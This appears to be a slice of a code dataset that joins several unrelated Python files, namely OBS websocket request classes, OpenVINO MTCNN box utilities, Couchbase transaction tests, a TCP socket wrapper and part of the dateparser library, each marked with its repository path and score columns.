self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class SetPreviewScene(Baserequests):
"""Set the active preview scene.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*scene_name*
type: String
The name of the scene to preview.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetPreviewScene'
self.dataout['scene-name'] = scene_name
class TransitionToProgram(Baserequests):
"""Transitions the currently previewed scene to the main output.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*with_transition*
type: Object (optional)
Change the active transition before switching scenes. Defaults to the active transition.
*with_transition.name*
type: String
Name of the transition.
*with_transition.duration*
type: int (optional)
Transition duration (in milliseconds).
"""
def __init__(self, with_transition=None):
Baserequests.__init__(self)
self.name = 'TransitionToProgram'
self.dataout['with-transition'] = with_transition
class EnableStudioMode(Baserequests):
"""Enables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'EnableStudioMode'
class DisableStudioMode(Baserequests):
"""Disables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'DisableStudioMode'
class ToggleStudioMode(Baserequests):
"""Toggles Studio Mode (depending on the current state of studio mode).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ToggleStudioMode'
class GetTransitionList(Baserequests):
"""List of all transitions available in the frontend's dropdown menu.
:Returns:
*current_transition*
type: String
Name of the currently active transition.
*transitions*
type: Array<Object>
List of transitions.
*transitions.*.name*
type: String
Name of the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionList'
self.datain['current-transition'] = None
self.datain['transitions'] = None
def getCurrentTransition(self):
return self.datain['current-transition']
def getTransitions(self):
return self.datain['transitions']
class GetCurrentTransition(Baserequests):
"""Get the name of the currently selected transition in the frontend's dropdown menu.
:Returns:
*name*
type: String
Name of the selected transition.
*duration*
type: int (optional)
Transition duration (in milliseconds) if supported by the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentTransition'
self.datain['name'] = None
self.datain['duration'] = None
def getName(self):
return self.datain['name']
def getDuration(self):
return self.datain['duration']
class SetCurrentTransition(Baserequests):
"""Set the active transition.
:Arguments:
*transition_name*
type: String
The name of the transition.
"""
def __init__(self, transition_name):
Baserequests.__init__(self)
self.name = 'SetCurrentTransition'
self.dataout['transition-name'] = transition_name
class SetTransitionDuration(Baserequests):
"""Set the duration of the currently selected transition if supported.
:Arguments:
*duration*
type: int
Desired duration of the transition (in milliseconds).
"""
def __init__(self, duration):
Baserequests.__init__(self)
self.name = 'SetTransitionDuration'
self.dataout['duration'] = duration
class GetTransitionDuration(Baserequests):
"""Get the duration of the currently selected transition if supported.
:Returns:
*transition_duration*
type: int
Duration of the current transition (in milliseconds).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionDuration'
self.datain['transition-duration'] = None
def getTransitionDuration(self):
return self.datain['transition-duration']
class GetTransitionPosition(Baserequests):
"""Get the position of the current transition.
:Returns:
*position*
type: double
current transition position. This value will be between 0.0 and 1.0. Note: Transition returns 1.0 when not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionPosition'
self.datain['position'] = None
def getPosition(self):
return self.datain['position']
class GetTransitionSettings(Baserequests):
"""Get the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
:Returns:
*transitionSettings*
type: Object
Current transition settings
"""
def __init__(self, transitionName):
Baserequests.__init__(self)
self.name = 'GetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
def getTransitionSettings(self):
return self.datain['transitionSettings']
class SetTransitionSettings(Baserequests):
"""Change the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
*transitionSettings*
type: Object
Transition settings (they can be partial)
:Returns:
*transitionSettings*
type: Object
Updated transition settings
"""
def __init__(self, transitionName, transitionSettings):
Baserequests.__init__(self)
self.name = 'SetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
self.dataout['transitionSettings'] = transitionSettings
def getTransitionSettings(self):
return self.datain['transitionSettings']
class ReleaseTBar(Baserequests):
"""Release the T-Bar (like a user releasing their mouse button after moving it).
*YOU MUST CALL THIS if you called `SetTBarPosition` with the `release` parameter set to `false`.*
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ReleaseTBar'
class SetTBarPosition(Baserequests):
"""
If your code needs to perform multiple successive T-Bar moves (e.g. : in an animation, or in response to a user moving a T-Bar control in your User Interface), set `release` to false and call `ReleaseTBar` later once the animation/interaction is over.
:Arguments:
*position*
type: double
T-Bar position. This value must be between 0.0 and 1.0.
*release*
type: boolean (optional)
Whether or not the T-Bar gets released automatically after setting its new position (like a user releasing their mouse button after moving the T-Bar). Call `ReleaseTBar` manually if you set `release` to false. Defaults to true.
"""
def __init__(self, position, release=None):
Baserequests.__init__(self)
self.name = 'SetTBarPosition'
self.dataout['position'] = position
self.dataout['release'] = release
| 2.0625 | 2 |
simple_history/tests/custom_user/admin.py | rdurica/django-simple-history | 911 | 3321 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import CustomUser
admin.site.register(CustomUser, UserAdmin)
| 1.335938 | 1 |
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py | Pandinosaurus/open_model_zoo | 1 | 3322 | """
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
| 1.796875 | 2 |
pytests/Atomicity/basic_ops.py | ashwin2002/TAF | 0 | 3323 | <gh_stars>0
from Cb_constants import DocLoading
from basetestcase import ClusterSetup
from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator
from couchbase_helper.tuq_generators import JsonGenerator
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from com.couchbase.client.java.json import JsonObject
"""
Basic test cases with commit,rollback scenarios
"""
class basic_ops(ClusterSetup):
def setUp(self):
super(basic_ops, self).setUp()
if self.num_buckets:
self.bucket_util.create_multiple_buckets(
self.cluster.master,
self.num_replicas,
bucket_count=self.num_buckets,
bucket_type=self.bucket_type,
ram_quota=self.bucket_size,
storage=self.bucket_storage,
eviction_policy=self.bucket_eviction_policy)
else:
self.create_bucket()
self.sleep(10, "Wait for bucket to become ready for ops")
# Reset active_resident_threshold to avoid further data load as DGM
self.active_resident_threshold = 0
self.log.info("==========Finished Basic_ops base setup========")
def tearDown(self):
super(basic_ops, self).tearDown()
def get_doc_generator(self, start, end):
age = range(5)
first = ['james', 'sharon']
body = [''.rjust(self.doc_size - 10, 'a')]
template = JsonObject.create()
template.put("age", None)
template.put("first_name", None)
template.put("body", None)
generator = DocumentGenerator(self.key, template, randomize=True,
age=age,
first_name=first, body=body,
start=start, end=end,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type)
return generator
@staticmethod
def generate_docs_bigdata(docs_per_day, start=0, document_size=1024000):
json_generator = JsonGenerator()
return json_generator.generate_docs_bigdata(end=docs_per_day,
start=start,
value_size=document_size)
def test_basic_commit(self):
"""
Test transaction commit, rollback, time ahead,
time behind scenarios with replica, persist_to and
replicate_to settings
"""
# Atomicity.basic_ops.basic_ops.test_basic_commit
self.drift_ahead = self.input.param("drift_ahead", False)
self.drift_behind = self.input.param("drift_behind", False)
gen_create = self.get_doc_generator(0, self.num_items)
self.op_type = self.input.param("op_type", 'create')
if self.drift_ahead:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set forward {0}'.format(output))
if self.drift_behind:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(-3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set behind {0}'.format(output))
self.log.info("Loading docs using AtomicityTask")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, self.op_type, exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
if self.op_type == "time_out":
self.sleep(90, "Wait for staged docs to get cleared")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=200,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.task_manager.get_task_result(task)
def test_large_doc_size_commit(self):
gen_create = self.generate_docs_bigdata(docs_per_day=self.num_items,
document_size=self.doc_size)
self.log.info("going to create a task")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
def test_MB_41944(self):
num_index = self.input.param("num_index", 1)
# Create doc_gen for loading
doc_gen = doc_generator(self.key, 0, 1)
# Get key for delete op and reset the gen
key, v = doc_gen.next()
doc_gen.reset()
# Open SDK client connection
client = SDKClient([self.cluster.master], self.bucket_util.buckets[0])
query = list()
query.append("CREATE PRIMARY INDEX index_0 on %s USING GSI"
% self.bucket_util.buckets[0].name)
if num_index == 2:
query.append("CREATE INDEX index_1 on %s(name,age) "
"WHERE mutated=0 USING GSI"
% self.bucket_util.buckets[0].name)
# Create primary index on the bucket
for q in query:
client.cluster.query(q)
# Wait for index to become online`
for index, _ in enumerate(query):
query = "SELECT state FROM system:indexes WHERE name='index_%s'" \
% index
index = 0
state = None
while index < 30:
state = client.cluster.query(query) \
.rowsAsObject()[0].get("state")
if state == "online":
break
self.sleep(1)
if state != "online":
self.log_failure("Index 'index_%s' not yet online" % index)
# Start transaction to create the doc
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Perform sub_doc operation on same key
_, fail = client.crud(DocLoading.Bucket.SubDocOps.INSERT,
key=key, value=["_sysxattr", "sysxattr-payload"],
xattr=True)
if fail:
self.log_failure("Subdoc insert failed: %s" % fail)
else:
self.log.info("Subdoc insert success")
# Delete the created doc
result = client.crud(DocLoading.Bucket.DocOps.DELETE, key)
if result["status"] is False:
self.log_failure("Doc delete failed: %s" % result["error"])
else:
self.log.info("Document deleted")
# Re-insert same doc through transaction
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Close SDK Client connection
client.close()
self.validate_test_failure()
| 1.84375 | 2 |
reverseWord.py | lovefov/Python | 0 | 3324 | #!/usr/bin/env python3
#-*- coding:utf-8 -*-
#Author:贾江超
def spin_words(sentence):
list1=sentence.split()
l=len(list1)
for i in range(l):
relen = len(sentence.split()[i:][0])
if relen > 5:
list1[i]=list1[i][::-1]
return ' '.join(list1)
'''
注意 在2.x版本可以用len()得到list的长度 3.x版本就不行了
优化版本
def spin_words(sentence):
# Your code goes here
return " ".join([x[::-1] if len(x) >= 5 else x for x in sentence.split(" ")])
在这里倒序字符串用切片很方便 str[::-1] 就ok了
'''
| 3.6875 | 4 |
src/scs_host/comms/network_socket.py | south-coast-science/scs_host_cpc | 0 | 3325 | <reponame>south-coast-science/scs_host_cpc<gh_stars>0
"""
Created on 30 May 2017
@author: <NAME> (<EMAIL>)
A network socket abstraction, implementing ProcessComms
"""
import socket
import time
from scs_core.sys.process_comms import ProcessComms
# --------------------------------------------------------------------------------------------------------------------
class NetworkSocket(ProcessComms):
"""
classdocs
"""
__TIMEOUT = 4.0 # seconds
__BUFFER_SIZE = 1024 # bytes
__BACKLOG = 5
__ACK = "ACK"
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, host, port=2000): # a receiving socket should have host ''
"""
Constructor
"""
self.__address = (host, port)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.__conn = None
# ----------------------------------------------------------------------------------------------------------------
def connect(self, wait_for_availability=True):
while True:
try:
self.__socket.connect(self.__address)
break
except ConnectionRefusedError as ex:
if not wait_for_availability:
raise ConnectionRefusedError(ex)
time.sleep(0.1)
def close(self):
try:
if self.__conn:
self.__conn.close()
except RuntimeError:
pass
try:
self.__socket.close()
except RuntimeError:
pass
# ----------------------------------------------------------------------------------------------------------------
def read(self):
# socket...
self.__socket.bind(self.__address)
self.__socket.listen(NetworkSocket.__BACKLOG)
self.__conn, _ = self.__socket.accept()
# data...
while True:
message = self.__conn.recv(NetworkSocket.__BUFFER_SIZE).decode().strip()
if len(message) == 0:
break
yield message
def write(self, message, wait_for_availability=True):
while True:
try:
# data...
self.__socket.send(message.encode())
# wait for ACK...
timeout = time.time() + NetworkSocket.__TIMEOUT
while self.__socket.recv(NetworkSocket.__BUFFER_SIZE).decode() != NetworkSocket.__ACK:
time.sleep(0.001)
if time.time() > timeout:
break
break
except ConnectionError:
if not wait_for_availability:
raise
self.close()
time.sleep(0.1)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.connect()
# ----------------------------------------------------------------------------------------------------------------
def ack(self):
self.__conn.send(str(NetworkSocket.__ACK).encode())
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "NetworkSocket:{address:%s, socket:%s}" % (self.__address, self.__socket)
| 2.671875 | 3 |
dateparser/date.py | JKhakpour/dateparser | 2 | 3326 | <reponame>JKhakpour/dateparser
# -*- coding: utf-8 -*-
import calendar
import collections
from datetime import datetime, timedelta
from warnings import warn
import six
import regex as re
from dateutil.relativedelta import relativedelta
from dateparser.date_parser import date_parser
from dateparser.freshness_date_parser import freshness_date_parser
from dateparser.languages.loader import LanguageDataLoader
from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages
from dateparser.conf import apply_settings
from dateparser.utils import normalize_unicode, apply_timezone_from_settings
APOSTROPHE_LOOK_ALIKE_CHARS = [
u'\N{RIGHT SINGLE QUOTATION MARK}', # u'\u2019'
u'\N{MODIFIER LETTER APOSTROPHE}', # u'\u02bc'
u'\N{MODIFIER LETTER TURNED COMMA}', # u'\u02bb'
u'\N{ARMENIAN APOSTROPHE}', # u'\u055a'
u'\N{LATIN SMALL LETTER SALTILLO}', # u'\ua78c'
u'\N{PRIME}', # u'\u2032'
u'\N{REVERSED PRIME}', # u'\u2035'
u'\N{MODIFIER LETTER PRIME}', # u'\u02b9'
u'\N{FULLWIDTH APOSTROPHE}', # u'\uff07'
]
RE_NBSP = re.compile(u'\xa0', flags=re.UNICODE)
RE_SPACES = re.compile(r'\s+')
RE_TRIM_SPACES = re.compile(r'^\s+(\S.*?)\s+$')
RE_SANITIZE_SKIP = re.compile(r'\t|\n|\r|\u00bb|,\s\u0432|\u200e|\xb7|\u200f|\u064e|\u064f', flags=re.M)
RE_SANITIZE_RUSSIAN = re.compile(r'([\W\d])\u0433\.', flags=re.I | re.U)
RE_SANITIZE_AMPM = re.compile(r'\b([ap])(\.)?m(\.)?\b', flags=re.DOTALL | re.I)
RE_SANITIZE_ON = re.compile(r'^.*?on:\s+(.*)')
RE_SANITIZE_APOSTROPHE = re.compile(u'|'.join(APOSTROPHE_LOOK_ALIKE_CHARS))
RE_SEARCH_TIMESTAMP = re.compile(r'^\d{10}(?![^\d.])')
def sanitize_spaces(html_string):
html_string = RE_NBSP.sub(' ', html_string)
html_string = RE_SPACES.sub(' ', html_string)
html_string = RE_TRIM_SPACES.sub(r'\1', html_string)
return html_string
def date_range(begin, end, **kwargs):
dateutil_error_prone_args = ['year', 'month', 'week', 'day', 'hour',
'minute', 'second']
for arg in dateutil_error_prone_args:
if arg in kwargs:
raise ValueError("Invalid argument: %s" % arg)
step = relativedelta(**kwargs) if kwargs else relativedelta(days=1)
date = begin
while date < end:
yield date
date += step
# handles edge-case when iterating months and last interval is < 30 days
if kwargs.get('months', 0) > 0 and (date.year, date.month) == (end.year, end.month):
yield end
def get_intersecting_periods(low, high, period='day'):
if period not in ['year', 'month', 'week', 'day', 'hour', 'minute', 'second', 'microsecond']:
raise ValueError("Invalid period: {}".format(period))
if high <= low:
return
step = relativedelta(**{period + 's': 1})
current_period_start = low
if isinstance(current_period_start, datetime):
reset_arguments = {}
for test_period in ['microsecond', 'second', 'minute', 'hour']:
if test_period == period:
break
else:
reset_arguments[test_period] = 0
current_period_start = current_period_start.replace(**reset_arguments)
if period == 'week':
current_period_start \
= current_period_start - timedelta(days=current_period_start.weekday())
elif period == 'month':
current_period_start = current_period_start.replace(day=1)
elif period == 'year':
current_period_start = current_period_start.replace(month=1, day=1)
while current_period_start < high:
yield current_period_start
current_period_start += step
def sanitize_date(date_string):
date_string = RE_SANITIZE_SKIP.sub(' ', date_string)
date_string = RE_SANITIZE_RUSSIAN.sub(r'\1 ', date_string) # remove u'г.' (Russian for year) but not in words
date_string = sanitize_spaces(date_string)
date_string = RE_SANITIZE_AMPM.sub(r'\1m', date_string)
date_string = RE_SANITIZE_ON.sub(r'\1', date_string)
date_string = RE_SANITIZE_APOSTROPHE.sub(u"'", date_string)
return date_string
def get_date_from_timestamp(date_string, settings):
if RE_SEARCH_TIMESTAMP.search(date_string):
date_obj = datetime.fromtimestamp(int(date_string[:10]))
date_obj = apply_timezone_from_settings(date_obj, settings)
return date_obj
def get_last_day_of_month(year, month):
return calendar.monthrange(year, month)[1]
def parse_with_formats(date_string, date_formats, settings):
""" Parse with formats and return a dictionary with 'period' and 'obj_date'.
:returns: :class:`datetime.datetime`, dict or None
"""
period = 'day'
for date_format in date_formats:
try:
date_obj = datetime.strptime(date_string, date_format)
except ValueError:
continue
else:
# If format does not include the day, use last day of the month
# instead of first, because the first is usually out of range.
if '%d' not in date_format:
period = 'month'
date_obj = date_obj.replace(
day=get_last_day_of_month(date_obj.year, date_obj.month))
if not ('%y' in date_format or '%Y' in date_format):
today = datetime.today()
date_obj = date_obj.replace(year=today.year)
date_obj = apply_timezone_from_settings(date_obj, settings)
return {'date_obj': date_obj, 'period': period}
else:
return {'date_obj': None, 'period': period}
class _DateLanguageParser(object):
DATE_FORMATS_ERROR_MESSAGE = "Date formats should be list, tuple or set of strings"
def __init__(self, language, date_string, date_formats, settings=None):
self._settings = settings
if isinstance(date_formats, six.string_types):
warn(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)
date_formats = [date_formats]
elif not (date_formats is None or isinstance(date_formats, (list, tuple, collections.Set))):
raise TypeError(self.DATE_FORMATS_ERROR_MESSAGE)
self.language = language
self.date_string = date_string
self.date_formats = date_formats
self._translated_date = None
self._translated_date_with_formatting = None
@classmethod
def parse(cls, language, date_string, date_formats=None, settings=None):
instance = cls(language, date_string, date_formats, settings)
return instance._parse()
def _parse(self):
for parser in (
self._try_timestamp,
self._try_freshness_parser,
self._try_given_formats,
self._try_parser,
self._try_hardcoded_formats,
):
date_obj = parser()
if self._is_valid_date_obj(date_obj):
return date_obj
else:
return None
def _try_timestamp(self):
return {
'date_obj': get_date_from_timestamp(self.date_string, self._settings),
'period': 'day',
}
def _try_freshness_parser(self):
return freshness_date_parser.get_date_data(self._get_translated_date(), self._settings)
def _try_parser(self):
_order = self._settings.DATE_ORDER
try:
if self._settings.PREFER_LANGUAGE_DATE_ORDER:
self._settings.DATE_ORDER = self.language.info.get('dateorder', _order)
date_obj, period = date_parser.parse(
self._get_translated_date(), settings=self._settings)
self._settings.DATE_ORDER = _order
return {
'date_obj': date_obj,
'period': period,
}
except ValueError:
self._settings.DATE_ORDER = _order
return None
def _try_given_formats(self):
if not self.date_formats:
return
return parse_with_formats(
self._get_translated_date_with_formatting(),
self.date_formats, settings=self._settings
)
def _try_hardcoded_formats(self):
hardcoded_date_formats = [
'%B %d, %Y, %I:%M:%S %p',
'%b %d, %Y at %I:%M %p',
'%d %B %Y %H:%M:%S',
'%A, %B %d, %Y',
'%Y-%m-%dT%H:%M:%S.%fZ'
]
try:
return parse_with_formats(
self._get_translated_date_with_formatting(),
hardcoded_date_formats,
settings=self._settings
)
except TypeError:
return None
def _get_translated_date(self):
if self._translated_date is None:
self._translated_date = self.language.translate(
self.date_string, keep_formatting=False, settings=self._settings)
return self._translated_date
def _get_translated_date_with_formatting(self):
if self._translated_date_with_formatting is None:
self._translated_date_with_formatting = self.language.translate(
self.date_string, keep_formatting=True, settings=self._settings)
return self._translated_date_with_formatting
def _is_valid_date_obj(self, date_obj):
if not isinstance(date_obj, dict):
return False
if len(date_obj) != 2:
return False
if 'date_obj' not in date_obj or 'period' not in date_obj:
return False
if not date_obj['date_obj']:
return False
if date_obj['period'] not in ('day', 'week', 'month', 'year'):
return False
return True
class DateDataParser(object):
"""
Class which handles language detection, translation and subsequent generic parsing of
string representing date and/or time.
:param languages:
A list of two letters language codes, e.g. ['en', 'es'].
If languages are given, it will not attempt to detect the language.
:type languages: list
:param allow_redetect_language:
Enables/disables language re-detection.
:type allow_redetect_language: bool
:param settings:
Configure customized behavior using settings defined in :mod:`dateparser.conf.Settings`.
:type settings: dict
:return: A parser instance
:raises:
ValueError - Unknown Language, TypeError - Languages argument must be a list
"""
language_loader = None
@apply_settings
def __init__(self, languages=None, allow_redetect_language=False, settings=None):
self._settings = settings
available_language_map = self._get_language_loader().get_language_map()
if isinstance(languages, (list, tuple, collections.Set)):
if all([language in available_language_map for language in languages]):
languages = [available_language_map[language] for language in languages]
else:
unsupported_languages = set(languages) - set(available_language_map.keys())
raise ValueError(
"Unknown language(s): %s" % ', '.join(map(repr, unsupported_languages)))
elif languages is not None:
raise TypeError("languages argument must be a list (%r given)" % type(languages))
if allow_redetect_language:
self.language_detector = AutoDetectLanguage(
languages if languages else list(available_language_map.values()),
allow_redetection=True)
elif languages:
self.language_detector = ExactLanguages(languages=languages)
else:
self.language_detector = AutoDetectLanguage(
list(available_language_map.values()), allow_redetection=False)
def get_date_data(self, date_string, date_formats=None):
"""
Parse string representing date and/or time in recognizable localized formats.
Supports parsing multiple languages and timezones.
:param date_string:
A string representing date and/or time in a recognizably valid format.
:type date_string: str|unicode
:param date_formats:
A list of format strings using directives as given
`here <https://docs.python.org/2/library/datetime.html#strftime-and-strptime-behavior>`_.
The parser applies formats one by one, taking into account the detected languages.
:type date_formats: list
:return: a dict mapping keys to :mod:`datetime.datetime` object and *period*. For example:
{'date_obj': datetime.datetime(2015, 6, 1, 0, 0), 'period': u'day'}
